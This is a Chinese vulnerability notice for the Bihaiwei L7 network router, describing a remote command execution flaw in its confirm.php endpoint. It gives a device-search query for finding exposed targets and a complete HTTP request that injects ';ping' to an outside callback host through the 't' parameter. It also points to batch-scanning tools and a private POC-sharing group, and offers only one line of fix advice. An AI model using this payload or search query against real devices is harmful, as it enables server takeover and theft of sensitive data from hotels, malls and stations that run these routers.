0x01 产品简介
碧海威L7网络设备是 北京智慧云巅科技有限公司下的产品,基于国产化ARM硬件平台,采用软硬一体协同设计方案,释放出产品最大效能,具有高性能,高扩展,产品性能强劲,具备万兆吞吐能力,支持上万用户同时在线等高性能。其采用简单清晰的可视化WEB管理界面,支持最新HTML5,方便移动设备访问管理,分级别多层次管理模块,使用简单,维护方便;设备状况、网络流量一目了然,一键备份/恢复,让网络管理更简单。是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备,具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。
0x02 漏洞概述
碧海威L7 confirm.php接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
0x03 搜索语法
app="碧海威科技-L7云路由"
0x04 漏洞复现
GET /notice/confirm.php?t=;ping%20xfkxbcjeee.dgrh3.cn HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC
脚本分享圈子
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本